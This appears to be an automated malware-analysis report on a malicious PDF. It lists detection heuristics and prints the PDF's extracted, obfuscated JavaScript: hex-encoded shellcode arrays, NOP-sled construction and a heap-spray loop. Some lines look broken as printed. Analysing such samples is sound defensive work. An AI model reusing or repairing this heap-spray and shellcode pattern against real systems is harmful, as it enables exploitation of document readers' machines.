MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream, named 'javascript_obj0007_000.js', appears to be obfuscated, as suggested by the PDF_UNESCAPE firing and the 'Script obfuscation indicators' signal. The obfuscated nature of the script prevents a detailed analysis of its specific actions, but it is likely designed to download and execute a second-stage payload or perform other malicious activities. The presence of JavaScript within a PDF is a common delivery mechanism for malware.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var temp1 = unescape(pt5()); -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x26D | 1739 bytes |
SHA-256: 4e0caf646cc67915375aa926c0f22f602d3cead082b5d318323f4fd913be3f66 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function pt1() {
var ar1 = ["", "e8fc", "0089", "0000", "8960", "31e5", "64d2", "528b", "8b30", "0c52", "528b", "8b14", "2872", "b70f", "264a", "ff31", "c031", "3cac", "7c61", "2c02", "c120", "0dcf", "c701"];
return ar1;
}
function pt2() {
var ar2 = ["f0e2", "5752", "528b", "8b10", "3c42", "d001", "408b", "8578", "74c0", "014a", "50d0", "488b", "8b18", "2058", "d301", "3ce3", "8b49", "8b34", "d601", "ff31", "c031", "c1ac"];
return ar2;
}
function pt3() {
var ar3 = ["0dcf", "c701", "e038", "f475", "7d03", "3bf8", "247d", "e275", "8b58", "2458", "d301", "8b66", "4b0c", "588b", "011c", "8bd3", "8b04", "d001", "4489", "2424", "5b5b", "5961", "515a", "e0ff", "5f58", "8b5a", "eb12", "5d86", "016a", "858d", "00b9", "0000", "6850", "8b31", "876f", "d5ff", "f0bb", "a2b5", "6856", "95a6", "9dbd", "d5ff", "063c", "0a7c", "fb80", "75e0", "bb05", "1347", "6f72", "006a", "ff53", "63d5", "6c61", "2e63", "7865", "0065"];
return ar3;
}
function pt5() {
return "pt1().concat(pt2(),pt3()).join('%u')";
}
function et1() {
var ary1 = ["90", "90"];
return ary1;
}
var temp1 = unescape(pt5());
e9 = et1.join("%u").concat(et1.join("%u"));
var temp2 = "";
for (i = 128; i >= 0; --i) {
temp2 += unescape(e1);
}
temp4 = temp2 + temp1;
temp5 = unescape(e1);
temp6 = 20;
temp7 = temp6 + temp4.length
while (temp5.length < temp7) temp5 += temp5;
temp8 = temp5.substring(0, temp7);
temp9 = temp5.substring(0, temp5.length - temp7);
while (temp9.length + temp7 < 0x40000) temp9 = temp9 + temp9 + temp8;
temp10 = new Array();
for (temp11 = 0; temp11 < 1450; temp11++) temp10[temp11] = temp9 + temp4;
var temp12 = unescape("%"+"0"+"9");
while (temp12.length < 0x4000) temp12 += temp12;
temp12 = "N." + temp12;
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.